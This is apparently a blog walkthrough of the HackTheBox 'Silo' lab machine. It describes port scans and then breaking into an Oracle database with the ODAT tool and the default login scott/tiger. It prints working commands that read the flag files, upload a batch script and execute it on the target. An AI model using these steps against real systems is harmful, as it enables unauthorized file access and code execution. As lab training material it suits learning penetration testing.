Silo Box Writeup & Walkthrough – [HTB] – HackTheBox

posted in HackTheBox, Writeup on by

Introduction

Silo is a machine on the HackTheBox.

Hack The Box is an online platform allowing you to test your penetration testing skills and exchange ideas and methodologies with other members of similar interests. It contains several challenges that are constantly updated.

This article will show how to hack Silo box and get user.txt and root.txt.

Silo Box

Collection

First, we scan the Silo box open ports and see if there are some services are weak.

Silo Scan Ports

There are a lots of ports open. Let’s try it one by one.

Hack the Silo Box

Hack the Silo box http service

The HTTP server is running on this box, so let’s start on this service first. Open browser, and visit website.

Silo HTTP Service

The webpage is a default IIS Webpage. So, I am assuming that it is not the correct way. But, just in case, we use dirb to enumerate and see what can we find.

Silo dirb

Unluckily, we did not find anything. So, let’s move on the next service.

Hack 135, 139 & 445 ports

For hacking these services, we can use metasploit. But, After my testing, there is no vulnerability on these services. So, the correct way should be Oracle Database.

Hack the Oracle Database

I had been working around 3 years as a database & system Administrator. So, I knew where is the weakness of a database. For hacking Oracle database, we are using this tool: ODat

You will spend few hours to install this tool on your Kali Linux. But, after install this tool. Everything is easy. (In this article, I will not show you how to install it, because there are too many tutorials to show how to install it)

After install ODat, the next step is, we need to find which user is using default or weak credentials. This is the List of Oracle default credentials.

Silo Oracle Default Credentials

After testing, we can find a default credential:

Username: scott

Password: tiger

Then, we run command to get root.txt:

./odat.py externaltable -s 10.10.10.82 -d XE -U scott -P tiger --getFile "c:/Users/Administrator/Desktop" "root.txt" "spz.io" --sysdba

Silo Root

Get User.txt is a little bit difficult. First, we need to write a bat script to list users folder to figure out the username.

We create a new file, name is 1.bat, and the content is:

Silo 1.bat file

Then, we use command to upload the file and run the script.

./odat.py dbmsxslprocessor -s 10.10.10.82 -d XE -U scott -P tiger --putFile "c:/" 1.bat /root/Desktop/1.bat --sysdba

Then, we ran the command to get the user folder list, and we got the username:

./odat.py externaltable -s 10.10.10.82 -d XE -U scott -P tiger --exec "dir C:/" 1.bat --sysdba

Silo UserName

Ha, we got the user name “Phineas”. Then, we can run the same command to get the user.txt. (The command is similar with read root.txt, just need to change the location to C:/Users/Phineas/Desktop/user.txt)

Silo User

Summary

Generally, this box is easy. What you need to do is that spent few hours to install ODat on your Kali Linux. I spent around 2 hours to install this tool. Then, spent 10 mins to root this box. The difficulty of this box should around 5. (4 is for install ODat tool + 1 is for root this box).

There is my another write up of Aragog Box.